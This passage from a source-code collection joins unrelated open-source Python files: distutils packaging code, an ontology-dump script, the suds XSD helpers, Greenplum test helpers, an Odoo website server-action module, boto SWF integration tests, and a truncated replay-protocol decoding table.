self.bdist_base = os.path.join(build_base,
'bdist.' + self.plat_name)
self.ensure_string_list('formats')
if self.formats is None:
try:
self.formats = [self.default_format[os.name]]
except KeyError:
raise DistutilsPlatformError, \
"don't know how to create built distributions " + \
"on platform %s" % os.name
if self.dist_dir is None:
self.dist_dir = "dist"
def run(self):
# Figure out which sub-commands we need to run.
commands = []
for format in self.formats:
try:
commands.append(self.format_command[format][0])
except KeyError:
raise DistutilsOptionError, "invalid format '%s'" % format
# Reinitialize and run each command.
for i in range(len(self.formats)):
cmd_name = commands[i]
sub_cmd = self.reinitialize_command(cmd_name)
if cmd_name not in self.no_format_option:
sub_cmd.format = self.formats[i]
# passing the owner and group names for tar archiving
if cmd_name == 'bdist_dumb':
sub_cmd.owner = self.owner
sub_cmd.group = self.group
# If we're going to need to run this command again, tell it to
# keep its temporary files around so subsequent runs go faster.
if cmd_name in commands[i+1:]:
sub_cmd.keep_temp = 1
self.run_command(cmd_name)
| gpl-3.0 |
pyIMS/pyimzML | pyimzml/ontology/dump_obo_files.py | 2 | 1779 | # This file is not intended for general use. Its purpose is to dump the .obo files that define
# the cvParam accession fields into a dependency-free format that can be bundled with pyimzml.
#
# It requires the additonal pip dependency obonet==0.2.6
import re
from collections import defaultdict
from datetime import datetime
from pprint import pformat
ontology_sources = [
('ms', 'https://raw.githubusercontent.com/HUPO-PSI/psi-ms-CV/master/psi-ms.obo', ['MS']),
('uo', 'https://raw.githubusercontent.com/bio-ontology-research-group/unit-ontology/master/unit.obo', ['UO']),
('ims', 'https://raw.githubusercontent.com/imzML/imzML/f2c8b6ce2affa8d8eef74d4bfe5922c815ff4dff/imagingMS.obo', ['IMS']),
]
if __name__ == '__main__':
import obonet
now = datetime.utcnow().isoformat()
for ontology_name, src, namespaces in ontology_sources:
print(f'Parsing {ontology_name}')
graph = obonet.read_obo(src, ignore_obsolete=False)
terms = {}
enums = defaultdict(list)
for node_id in graph.nodes:
node = graph.nodes[node_id]
if any(node_id.startswith(ns) for ns in namespaces) and 'name' in node:
dtype = None
for xref in node.get('xref', []):
m = re.match(r'^value-type:xsd\\:(\w+) ', xref)
if m:
dtype = 'xsd:' + m[1]
break
terms[node_id] = (node['name'], dtype)
with open(f'./{ontology_name}.py', 'wt') as f:
f.write('# DO NOT EDIT BY HAND\n')
f.write(f'# This file was autogenerated by dump_obo_files.py at {now}\n')
terms_repr = pformat(terms, indent=4, width=100)
f.write(f'terms = {terms_repr}\n')
| apache-2.0 |
lmyrefelt/CouchPotatoServer | libs/suds/xsd/__init__.py | 205 | 3007 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
The I{schema} module provides a intelligent representation of
an XSD schema. The I{raw} model is the XML tree and the I{model}
is the denormalized, objectified and intelligent view of the schema.
Most of the I{value-add} provided by the model is centered around
tranparent referenced type resolution and targeted denormalization.
"""
from logging import getLogger
from suds import *
from suds.sax import Namespace, splitPrefix
log = getLogger(__name__)
def qualify(ref, resolvers, defns=Namespace.default):
"""
Get a reference that is I{qualified} by namespace.
@param ref: A referenced schema type name.
@type ref: str
@param resolvers: A list of objects to be used to resolve types.
@type resolvers: [L{sax.element.Element},]
@param defns: An optional target namespace used to qualify references
when no prefix is specified.
@type defns: A default namespace I{tuple: (prefix,uri)} used when ref not prefixed.
@return: A qualified reference.
@rtype: (name, namespace-uri)
"""
ns = None
p, n = splitPrefix(ref)
if p is not None:
if not isinstance(resolvers, (list, tuple)):
resolvers = (resolvers,)
for r in resolvers:
resolved = r.resolvePrefix(p)
if resolved[1] is not None:
ns = resolved
break
if ns is None:
raise Exception('prefix (%s) not resolved' % p)
else:
ns = defns
return (n, ns[1])
def isqref(object):
"""
Get whether the object is a I{qualified reference}.
@param object: An object to be tested.
@type object: I{any}
@rtype: boolean
@see: L{qualify}
"""
return (\
isinstance(object, tuple) and \
len(object) == 2 and \
isinstance(object[0], basestring) and \
isinstance(object[1], basestring))
class Filter:
def __init__(self, inclusive=False, *items):
self.inclusive = inclusive
self.items = items
def __contains__(self, x):
if self.inclusive:
result = ( x in self.items )
else:
result = ( x not in self.items )
return result
| gpl-3.0 |
lintzc/gpdb | gpMgmt/bin/gppylib/operations/test_utils_helper.py | 52 | 1452 | from gppylib.operations import Operation
"""
These objects needed for gppylib.operations.test.test_utils are pulled out of said file for
pickle/import/visibility reasons. See gppylib.operations.utils.RemoteOperation, #4.
"""
class TestOperation(Operation):
def execute(self):
return 1
class MyException(Exception): pass
class RaiseOperation(Operation):
def execute(self):
raise MyException()
# Exceptions cannot be nested.
# They cannot be pickled for reasons inherent to python. See utils.py
class RaiseOperation_Nested(Operation):
def execute(self):
raise RaiseOperation_Nested.MyException2()
class MyException2(Exception): pass
# Exceptions with args must follow a strange idiom! http://bugs.python.org/issue1692335
class RaiseOperation_Unsafe(Operation):
def execute(self):
raise ExceptionWithArgsUnsafe(1, 2)
class RaiseOperation_Safe(Operation):
def execute(self):
raise ExceptionWithArgs(1, 2)
# This is the proper idiom for a pickle-able exception with arguments: http://bugs.python.org/issue1692335
class ExceptionWithArgs(Exception):
def __init__(self, x, y):
self.x, self.y = x, y
Exception.__init__(self, x, y)
class ExceptionWithArgsUnsafe(Exception):
def __init__(self, x, y):
self.x, self.y = x, y
class RaiseOperation_Unpicklable(Operation):
def execute(self):
from pygresql import pg
raise pg.DatabaseError()
| apache-2.0 |
nathanaevitas/odoo | openerp/addons/website/models/ir_actions.py | 363 | 3074 | # -*- coding: utf-8 -*-
import urlparse
from openerp.http import request
from openerp.osv import fields, osv
class actions_server(osv.Model):
""" Add website option in server actions. """
_name = 'ir.actions.server'
_inherit = ['ir.actions.server']
def _compute_website_url(self, cr, uid, id, website_path, xml_id, context=None):
base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url', context=context)
link = website_path or xml_id or (id and '%d' % id) or ''
if base_url and link:
path = '%s/%s' % ('/website/action', link)
return '%s' % urlparse.urljoin(base_url, path)
return ''
def _get_website_url(self, cr, uid, ids, name, args, context=None):
res = dict.fromkeys(ids, False)
for action in self.browse(cr, uid, ids, context=context):
if action.state == 'code' and action.website_published:
res[action.id] = self._compute_website_url(cr, uid, action.id, action.website_path, action.xml_id, context=context)
return res
_columns = {
'xml_id': fields.function(
osv.osv.get_xml_id, type='char', string="External ID",
help="ID of the action if defined in a XML file"),
'website_path': fields.char('Website Path'),
'website_url': fields.function(
_get_website_url, type='char', string='Website URL',
help='The full URL to access the server action through the website.'),
'website_published': fields.boolean(
'Available on the Website', copy=False,
help='A code server action can be executed from the website, using a dedicated'
'controller. The address is <base>/website/action/<website_path>.'
'Set this field as True to allow users to run this action. If it'
'set to is False the action cannot be run through the website.'),
}
def on_change_website_path(self, cr, uid, ids, website_path, xml_id, context=None):
values = {
'website_url': self._compute_website_url(cr, uid, ids and ids[0] or None, website_path, xml_id, context=context)
}
return {'value': values}
def _get_eval_context(self, cr, uid, action, context=None):
""" Override to add the request object in eval_context. """
eval_context = super(actions_server, self)._get_eval_context(cr, uid, action, context=context)
if action.state == 'code':
eval_context['request'] = request
return eval_context
def run_action_code_multi(self, cr, uid, action, eval_context=None, context=None):
""" Override to allow returning response the same way action is already
returned by the basic server action behavior. Note that response has
priority over action, avoid using both. """
res = super(actions_server, self).run_action_code_multi(cr, uid, action, eval_context, context)
if 'response' in eval_context:
return eval_context['response']
return res
| agpl-3.0 |
jayceyxc/hue | desktop/core/ext-py/boto-2.42.0/tests/integration/swf/test_layer1.py | 136 | 10743 | """
Tests for Layer1 of Simple Workflow
"""
import os
import unittest
import time
from boto.swf.layer1 import Layer1
from boto.swf import exceptions as swf_exceptions
# A standard AWS account is permitted a maximum of 100 of SWF domains,
# registered or deprecated. Deleting deprecated domains on demand does
# not appear possible. Therefore, these tests reuse a default or
# user-named testing domain. This is named by the user via the environment
# variable BOTO_SWF_UNITTEST_DOMAIN, if available. Otherwise the default
# testing domain is literally "boto-swf-unittest-domain". Do not use
# the testing domain for other purposes.
BOTO_SWF_UNITTEST_DOMAIN = os.environ.get("BOTO_SWF_UNITTEST_DOMAIN",
"boto-swf-unittest-domain")
# A standard domain can have a maxiumum of 10,000 workflow types and
# activity types, registered or deprecated. Therefore, eventually any
# tests which register new workflow types or activity types would begin
# to fail with LimitExceeded. Instead of generating new workflow types
# and activity types, these tests reuse the existing types.
# The consequence of the limits and inability to delete deprecated
# domains, workflow types, and activity types is that the tests in
# this module will not test for the three register actions:
# * register_domain
# * register_workflow_type
# * register_activity_type
# Instead, the setUp of the TestCase create a domain, workflow type,
# and activity type, expecting that they may already exist, and the
# tests themselves test other things.
# If you really want to re-test the register_* functions in their
# ability to create things (rather than just reporting that they
# already exist), you'll need to use a new BOTO_SWF_UNITTEST_DOMAIN.
# But, beware that once you hit 100 domains, you are cannot create any
# more, delete existing ones, or rename existing ones.
# Some API calls establish resources, but these resources are not instantly
# available to the next API call. For testing purposes, it is necessary to
# have a short pause to avoid having tests fail for invalid reasons.
PAUSE_SECONDS = 4
class SimpleWorkflowLayer1TestBase(unittest.TestCase):
"""
There are at least two test cases which share this setUp/tearDown
and the class-based parameter definitions:
* SimpleWorkflowLayer1Test
* tests.swf.test_layer1_workflow_execution.SwfL1WorkflowExecutionTest
"""
swf = True
# Some params used throughout the tests...
# Domain registration params...
_domain = BOTO_SWF_UNITTEST_DOMAIN
_workflow_execution_retention_period_in_days = 'NONE'
_domain_description = 'test workflow domain'
# Type registration params used for workflow type and activity type...
_task_list = 'tasklist1'
# Workflow type registration params...
_workflow_type_name = 'wft1'
_workflow_type_version = '1'
_workflow_type_description = 'wft1 description'
_default_child_policy = 'REQUEST_CANCEL'
_default_execution_start_to_close_timeout = '600'
_default_task_start_to_close_timeout = '60'
# Activity type registration params...
_activity_type_name = 'at1'
_activity_type_version = '1'
_activity_type_description = 'at1 description'
_default_task_heartbeat_timeout = '30'
_default_task_schedule_to_close_timeout = '90'
_default_task_schedule_to_start_timeout = '10'
_default_task_start_to_close_timeout = '30'
def setUp(self):
# Create a Layer1 connection for testing.
# Tester needs boto config or keys in environment variables.
self.conn = Layer1()
# Register a domain. Expect None (success) or
# SWFDomainAlreadyExistsError.
try:
r = self.conn.register_domain(self._domain,
self._workflow_execution_retention_period_in_days,
description=self._domain_description)
assert r is None
time.sleep(PAUSE_SECONDS)
except swf_exceptions.SWFDomainAlreadyExistsError:
pass
# Register a workflow type. Expect None (success) or
# SWFTypeAlreadyExistsError.
try:
r = self.conn.register_workflow_type(self._domain,
self._workflow_type_name, self._workflow_type_version,
task_list=self._task_list,
default_child_policy=self._default_child_policy,
default_execution_start_to_close_timeout=
self._default_execution_start_to_close_timeout,
default_task_start_to_close_timeout=
self._default_task_start_to_close_timeout,
description=self._workflow_type_description)
assert r is None
time.sleep(PAUSE_SECONDS)
except swf_exceptions.SWFTypeAlreadyExistsError:
pass
# Register an activity type. Expect None (success) or
# SWFTypeAlreadyExistsError.
try:
r = self.conn.register_activity_type(self._domain,
self._activity_type_name, self._activity_type_version,
task_list=self._task_list,
default_task_heartbeat_timeout=
self._default_task_heartbeat_timeout,
default_task_schedule_to_close_timeout=
self._default_task_schedule_to_close_timeout,
default_task_schedule_to_start_timeout=
self._default_task_schedule_to_start_timeout,
default_task_start_to_close_timeout=
self._default_task_start_to_close_timeout,
description=self._activity_type_description)
assert r is None
time.sleep(PAUSE_SECONDS)
except swf_exceptions.SWFTypeAlreadyExistsError:
pass
def tearDown(self):
# Delete what we can...
pass
class SimpleWorkflowLayer1Test(SimpleWorkflowLayer1TestBase):
def test_list_domains(self):
# Find the domain.
r = self.conn.list_domains('REGISTERED')
found = None
for info in r['domainInfos']:
if info['name'] == self._domain:
found = info
break
self.assertNotEqual(found, None, 'list_domains; test domain not found')
# Validate some properties.
self.assertEqual(found['description'], self._domain_description,
'list_domains; description does not match')
self.assertEqual(found['status'], 'REGISTERED',
'list_domains; status does not match')
def test_list_workflow_types(self):
# Find the workflow type.
r = self.conn.list_workflow_types(self._domain, 'REGISTERED')
found = None
for info in r['typeInfos']:
if ( info['workflowType']['name'] == self._workflow_type_name and
info['workflowType']['version'] == self._workflow_type_version ):
found = info
break
self.assertNotEqual(found, None, 'list_workflow_types; test type not found')
# Validate some properties.
self.assertEqual(found['description'], self._workflow_type_description,
'list_workflow_types; description does not match')
self.assertEqual(found['status'], 'REGISTERED',
'list_workflow_types; status does not match')
def test_list_activity_types(self):
# Find the activity type.
r = self.conn.list_activity_types(self._domain, 'REGISTERED')
found = None
for info in r['typeInfos']:
if info['activityType']['name'] == self._activity_type_name:
found = info
break
self.assertNotEqual(found, None, 'list_activity_types; test type not found')
# Validate some properties.
self.assertEqual(found['description'], self._activity_type_description,
'list_activity_types; description does not match')
self.assertEqual(found['status'], 'REGISTERED',
'list_activity_types; status does not match')
def test_list_closed_workflow_executions(self):
# Test various legal ways to call function.
latest_date = time.time()
oldest_date = time.time() - 3600
# With startTimeFilter...
self.conn.list_closed_workflow_executions(self._domain,
start_latest_date=latest_date, start_oldest_date=oldest_date)
# With closeTimeFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date)
# With closeStatusFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
close_status='COMPLETED')
# With tagFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
tag='ig')
# With executionFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
workflow_id='ig')
# With typeFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
workflow_name='ig', workflow_version='ig')
# With reverseOrder...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
reverse_order=True)
def test_list_open_workflow_executions(self):
# Test various legal ways to call function.
latest_date = time.time()
oldest_date = time.time() - 3600
# With required params only...
self.conn.list_closed_workflow_executions(self._domain,
latest_date, oldest_date)
# With tagFilter...
self.conn.list_closed_workflow_executions(self._domain,
latest_date, oldest_date, tag='ig')
# With executionFilter...
self.conn.list_closed_workflow_executions(self._domain,
latest_date, oldest_date, workflow_id='ig')
# With typeFilter...
self.conn.list_closed_workflow_executions(self._domain,
latest_date, oldest_date,
workflow_name='ig', workflow_version='ig')
# With reverseOrder...
self.conn.list_closed_workflow_executions(self._domain,
latest_date, oldest_date, reverse_order=True)
| apache-2.0 |
paradox41/heroprotocol | heroprotocol/protocols/protocol47479.py | 21 | 26853 | # Copyright (c) 2015 Blizzard Entertainment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from heroprotocol.decoders import *
# Decoding instructions for each protocol type.
typeinfos = [
('_int',[(0,7)]), #0
('_int',[(0,4)]), #1
('_int',[(0,5)]), #2
('_int',[(0,6)]), #3
('_int',[(0,14)]), #4
('_int',[(0,22)]), #5
('_int',[(0,32)]), #6
('_choice',[(0,2),{0:('m_uint6',3),1:('m_uint14',4),2:('m_uint22',5),3:('m_uint32',6)}]), #7
('_struct',[[('m_userId',2,-1)]]), #8
('_blob',[(0,8)]), #9
('_int',[(0,8)]), #10
('_struct',[[('m_flags',10,0),('m_major',10,1),('m_minor',10,2),('m_revision',10,3),('m_build',6,4),('m_baseBuild',6,5)]]), #11
('_int',[(0,3)]), #12
('_bool',[]), #13
('_array',[(16,0),10]), #14
('_optional',[14]), #15
('_blob',[(16,0)]), #16
('_struct',[[('m_dataDeprecated',15,0),('m_data',16,1)]]), #17
('_struct',[[('m_signature',9,0),('m_version',11,1),('m_type',12,2),('m_elapsedGameLoops',6,3),('m_useScaledTime',13,4),('m_ngdpRootKey',17,5),('m_dataBuildNum',6,6),('m_fixedFileHash',17,7)]]), #18
('_fourcc',[]), #19
('_blob',[(0,7)]), #20
('_int',[(0,64)]), #21
('_struct',[[('m_region',10,0),('m_programId',19,1),('m_realm',6,2),('m_name',20,3),('m_id',21,4)]]), #22
('_struct',[[('m_a',10,0),('m_r',10,1),('m_g',10,2),('m_b',10,3)]]), #23
('_int',[(0,2)]), #24
('_optional',[10]), #25
('_struct',[[('m_name',9,0),('m_toon',22,1),('m_race',9,2),('m_color',23,3),('m_control',10,4),('m_teamId',1,5),('m_handicap',0,6),('m_observe',24,7),('m_result',24,8),('m_workingSetSlotId',25,9),('m_hero',9,10)]]), #26
('_array',[(0,5),26]), #27
('_optional',[27]), #28
('_blob',[(0,10)]), #29
('_blob',[(0,11)]), #30
('_struct',[[('m_file',30,0)]]), #31
('_optional',[13]), #32
('_int',[(-9223372036854775808,64)]), #33
('_blob',[(0,12)]), #34
('_blob',[(40,0)]), #35
('_array',[(0,6),35]), #36
('_optional',[36]), #37
('_array',[(0,6),30]), #38
('_optional',[38]), #39
('_struct',[[('m_playerList',28,0),('m_title',29,1),('m_difficulty',9,2),('m_thumbnail',31,3),('m_isBlizzardMap',13,4),('m_restartAsTransitionMap',32,16),('m_timeUTC',33,5),('m_timeLocalOffset',33,6),('m_description',34,7),('m_imageFilePath',30,8),('m_campaignIndex',10,15),('m_mapFileName',30,9),('m_cacheHandles',37,10),('m_miniSave',13,11),('m_gameSpeed',12,12),('m_defaultDifficulty',3,13),('m_modPaths',39,14)]]), #40
('_optional',[9]), #41
('_optional',[35]), #42
('_optional',[6]), #43
('_struct',[[('m_race',25,-1)]]), #44
('_struct',[[('m_team',25,-1)]]), #45
('_blob',[(0,9)]), #46
('_struct',[[('m_name',9,-18),('m_clanTag',41,-17),('m_clanLogo',42,-16),('m_highestLeague',25,-15),('m_combinedRaceLevels',43,-14),('m_randomSeed',6,-13),('m_racePreference',44,-12),('m_teamPreference',45,-11),('m_testMap',13,-10),('m_testAuto',13,-9),('m_examine',13,-8),('m_customInterface',13,-7),('m_testType',6,-6),('m_observe',24,-5),('m_hero',46,-4),('m_skin',46,-3),('m_mount',46,-2),('m_toonHandle',20,-1)]]), #47
('_array',[(0,5),47]), #48
('_struct',[[('m_lockTeams',13,-16),('m_teamsTogether',13,-15),('m_advancedSharedControl',13,-14),('m_randomRaces',13,-13),('m_battleNet',13,-12),('m_amm',13,-11),('m_competitive',13,-10),('m_practice',13,-9),('m_cooperative',13,-8),('m_noVictoryOrDefeat',13,-7),('m_heroDuplicatesAllowed',13,-6),('m_fog',24,-5),('m_observers',24,-4),('m_userDifficulty',24,-3),('m_clientDebugFlags',21,-2),('m_ammId',43,-1)]]), #49
('_int',[(1,4)]), #50
('_int',[(1,8)]), #51
('_bitarray',[(0,6)]), #52
('_bitarray',[(0,8)]), #53
('_bitarray',[(0,2)]), #54
('_bitarray',[(0,7)]), #55
('_struct',[[('m_allowedColors',52,-6),('m_allowedRaces',53,-5),('m_allowedDifficulty',52,-4),('m_allowedControls',53,-3),('m_allowedObserveTypes',54,-2),('m_allowedAIBuilds',55,-1)]]), #56
('_array',[(0,5),56]), #57
('_struct',[[('m_randomValue',6,-26),('m_gameCacheName',29,-25),('m_gameOptions',49,-24),('m_gameSpeed',12,-23),('m_gameType',12,-22),('m_maxUsers',2,-21),('m_maxObservers',2,-20),('m_maxPlayers',2,-19),('m_maxTeams',50,-18),('m_maxColors',3,-17),('m_maxRaces',51,-16),('m_maxControls',10,-15),('m_mapSizeX',10,-14),('m_mapSizeY',10,-13),('m_mapFileSyncChecksum',6,-12),('m_mapFileName',30,-11),('m_mapAuthorName',9,-10),('m_modFileSyncChecksum',6,-9),('m_slotDescriptions',57,-8),('m_defaultDifficulty',3,-7),('m_defaultAIBuild',0,-6),('m_cacheHandles',36,-5),('m_hasExtensionMod',13,-4),('m_isBlizzardMap',13,-3),('m_isPremadeFFA',13,-2),('m_isCoopMode',13,-1)]]), #58
('_optional',[1]), #59
('_optional',[2]), #60
('_struct',[[('m_color',60,-1)]]), #61
('_array',[(0,4),46]), #62
('_array',[(0,17),6]), #63
('_array',[(0,9),6]), #64
('_struct',[[('m_control',10,-20),('m_userId',59,-19),('m_teamId',1,-18),('m_colorPref',61,-17),('m_racePref',44,-16),('m_difficulty',3,-15),('m_aiBuild',0,-14),('m_handicap',0,-13),('m_observe',24,-12),('m_logoIndex',6,-11),('m_hero',46,-10),('m_skin',46,-9),('m_mount',46,-8),('m_artifacts',62,-7),('m_workingSetSlotId',25,-6),('m_rewards',63,-5),('m_toonHandle',20,-4),('m_licenses',64,-3),('m_tandemLeaderUserId',59,-2),('m_hasSilencePenalty',13,-1)]]), #65
('_array',[(0,5),65]), #66
('_struct',[[('m_phase',12,-11),('m_maxUsers',2,-10),('m_maxObservers',2,-9),('m_slots',66,-8),('m_randomSeed',6,-7),('m_hostUserId',59,-6),('m_isSinglePlayer',13,-5),('m_pickedMapTag',10,-4),('m_gameDuration',6,-3),('m_defaultDifficulty',3,-2),('m_defaultAIBuild',0,-1)]]), #67
('_struct',[[('m_userInitialData',48,-3),('m_gameDescription',58,-2),('m_lobbyState',67,-1)]]), #68
('_struct',[[('m_syncLobbyState',68,-1)]]), #69
('_struct',[[('m_name',20,-1)]]), #70
('_blob',[(0,6)]), #71
('_struct',[[('m_name',71,-1)]]), #72
('_struct',[[('m_name',71,-3),('m_type',6,-2),('m_data',20,-1)]]), #73
('_struct',[[('m_type',6,-3),('m_name',71,-2),('m_data',34,-1)]]), #74
('_array',[(0,5),10]), #75
('_struct',[[('m_signature',75,-2),('m_toonHandle',20,-1)]]), #76
('_struct',[[('m_gameFullyDownloaded',13,-14),('m_developmentCheatsEnabled',13,-13),('m_testCheatsEnabled',13,-12),('m_multiplayerCheatsEnabled',13,-11),('m_syncChecksummingEnabled',13,-10),('m_isMapToMapTransition',13,-9),('m_debugPauseEnabled',13,-8),('m_useGalaxyAsserts',13,-7),('m_platformMac',13,-6),('m_cameraFollow',13,-5),('m_baseBuildNum',6,-4),('m_buildNum',6,-3),('m_versionFlags',6,-2),('m_hotkeyProfile',46,-1)]]), #77
('_struct',[[]]), #78
('_int',[(0,16)]), #79
('_struct',[[('x',79,-2),('y',79,-1)]]), #80
('_struct',[[('m_which',12,-2),('m_target',80,-1)]]), #81
('_struct',[[('m_fileName',30,-5),('m_automatic',13,-4),('m_overwrite',13,-3),('m_name',9,-2),('m_description',29,-1)]]), #82
('_int',[(1,32)]), #83
('_struct',[[('m_sequence',83,-1)]]), #84
('_null',[]), #85
('_int',[(0,20)]), #86
('_int',[(-2147483648,32)]), #87
('_struct',[[('x',86,-3),('y',86,-2),('z',87,-1)]]), #88
('_struct',[[('m_targetUnitFlags',79,-7),('m_timer',10,-6),('m_tag',6,-5),('m_snapshotUnitLink',79,-4),('m_snapshotControlPlayerId',59,-3),('m_snapshotUpkeepPlayerId',59,-2),('m_snapshotPoint',88,-1)]]), #89
('_choice',[(0,2),{0:('None',85),1:('TargetPoint',88),2:('TargetUnit',89)}]), #90
('_struct',[[('m_target',90,-4),('m_time',87,-3),('m_verb',29,-2),('m_arguments',29,-1)]]), #91
('_struct',[[('m_data',91,-1)]]), #92
('_int',[(0,25)]), #93
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_abilCmdData',25,-1)]]), #94
('_optional',[94]), #95
('_choice',[(0,2),{0:('None',85),1:('TargetPoint',88),2:('TargetUnit',89),3:('Data',6)}]), #96
('_optional',[88]), #97
('_struct',[[('m_cmdFlags',93,-7),('m_abil',95,-6),('m_data',96,-5),('m_vector',97,-4),('m_sequence',83,-3),('m_otherUnit',43,-2),('m_unitGroup',43,-1)]]), #98
('_int',[(0,9)]), #99
('_bitarray',[(0,9)]), #100
('_array',[(0,9),99]), #101
('_choice',[(0,2),{0:('None',85),1:('Mask',100),2:('OneIndices',101),3:('ZeroIndices',101)}]), #102
('_struct',[[('m_unitLink',79,-4),('m_subgroupPriority',10,-3),('m_intraSubgroupPriority',10,-2),('m_count',99,-1)]]), #103
('_array',[(0,9),103]), #104
('_struct',[[('m_subgroupIndex',99,-4),('m_removeMask',102,-3),('m_addSubgroups',104,-2),('m_addUnitTags',64,-1)]]), #105
('_struct',[[('m_controlGroupId',1,-2),('m_delta',105,-1)]]), #106
('_struct',[[('m_controlGroupIndex',1,-3),('m_controlGroupUpdate',12,-2),('m_mask',102,-1)]]), #107
('_struct',[[('m_count',99,-6),('m_subgroupCount',99,-5),('m_activeSubgroupIndex',99,-4),('m_unitTagsChecksum',6,-3),('m_subgroupIndicesChecksum',6,-2),('m_subgroupsChecksum',6,-1)]]), #108
('_struct',[[('m_controlGroupId',1,-2),('m_selectionSyncData',108,-1)]]), #109
('_struct',[[('m_chatMessage',29,-1)]]), #110
('_struct',[[('m_speed',12,-1)]]), #111
('_int',[(-128,8)]), #112
('_struct',[[('m_delta',112,-1)]]), #113
('_struct',[[('x',87,-2),('y',87,-1)]]), #114
('_struct',[[('m_point',114,-4),('m_unit',6,-3),('m_pingedMinimap',13,-2),('m_option',87,-1)]]), #115
('_struct',[[('m_verb',29,-2),('m_arguments',29,-1)]]), #116
('_struct',[[('m_alliance',6,-2),('m_control',6,-1)]]), #117
('_struct',[[('m_unitTag',6,-1)]]), #118
('_struct',[[('m_unitTag',6,-2),('m_flags',10,-1)]]), #119
('_struct',[[('m_conversationId',87,-2),('m_replyId',87,-1)]]), #120
('_optional',[20]), #121
('_struct',[[('m_gameUserId',1,-6),('m_observe',24,-5),('m_name',9,-4),('m_toonHandle',121,-3),('m_clanTag',41,-2),('m_clanLogo',42,-1)]]), #122
('_array',[(0,5),122]), #123
('_int',[(0,1)]), #124
('_struct',[[('m_userInfos',123,-2),('m_method',124,-1)]]), #125
('_choice',[(0,3),{0:('None',85),1:('Checked',13),2:('ValueChanged',6),3:('SelectionChanged',87),4:('TextChanged',30),5:('MouseButton',6)}]), #126
('_struct',[[('m_controlId',87,-3),('m_eventType',87,-2),('m_eventData',126,-1)]]), #127
('_struct',[[('m_soundHash',6,-2),('m_length',6,-1)]]), #128
('_array',[(0,7),6]), #129
('_struct',[[('m_soundHash',129,-2),('m_length',129,-1)]]), #130
('_struct',[[('m_syncInfo',130,-1)]]), #131
('_struct',[[('m_queryId',79,-3),('m_lengthMs',6,-2),('m_finishGameLoop',6,-1)]]), #132
('_struct',[[('m_queryId',79,-2),('m_lengthMs',6,-1)]]), #133
('_struct',[[('m_animWaitQueryId',79,-1)]]), #134
('_struct',[[('m_sound',6,-1)]]), #135
('_struct',[[('m_transmissionId',87,-2),('m_thread',6,-1)]]), #136
('_struct',[[('m_transmissionId',87,-1)]]), #137
('_optional',[80]), #138
('_optional',[79]), #139
('_optional',[112]), #140
('_struct',[[('m_target',138,-6),('m_distance',139,-5),('m_pitch',139,-4),('m_yaw',139,-3),('m_reason',140,-2),('m_follow',13,-1)]]), #141
('_struct',[[('m_skipType',124,-1)]]), #142
('_int',[(0,11)]), #143
('_struct',[[('x',143,-2),('y',143,-1)]]), #144
('_struct',[[('m_button',6,-5),('m_down',13,-4),('m_posUI',144,-3),('m_posWorld',88,-2),('m_flags',112,-1)]]), #145
('_struct',[[('m_posUI',144,-3),('m_posWorld',88,-2),('m_flags',112,-1)]]), #146
('_struct',[[('m_achievementLink',79,-1)]]), #147
('_struct',[[('m_hotkey',6,-2),('m_down',13,-1)]]), #148
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_state',112,-1)]]), #149
('_struct',[[('m_soundtrack',6,-1)]]), #150
('_struct',[[('m_key',112,-2),('m_flags',112,-1)]]), #151
('_struct',[[('m_error',87,-2),('m_abil',95,-1)]]), #152
('_int',[(0,19)]), #153
('_struct',[[('m_decrementMs',153,-1)]]), #154
('_struct',[[('m_portraitId',87,-1)]]), #155
('_struct',[[('m_functionName',20,-1)]]), #156
('_struct',[[('m_result',87,-1)]]), #157
('_struct',[[('m_gameMenuItemIndex',87,-1)]]), #158
('_int',[(-32768,16)]), #159
('_struct',[[('m_wheelSpin',159,-2),('m_flags',112,-1)]]), #160
('_struct',[[('m_button',79,-1)]]), #161
('_struct',[[('m_cutsceneId',87,-2),('m_bookmarkName',20,-1)]]), #162
('_struct',[[('m_cutsceneId',87,-1)]]), #163
('_struct',[[('m_cutsceneId',87,-3),('m_conversationLine',20,-2),('m_altConversationLine',20,-1)]]), #164
('_struct',[[('m_cutsceneId',87,-2),('m_conversationLine',20,-1)]]), #165
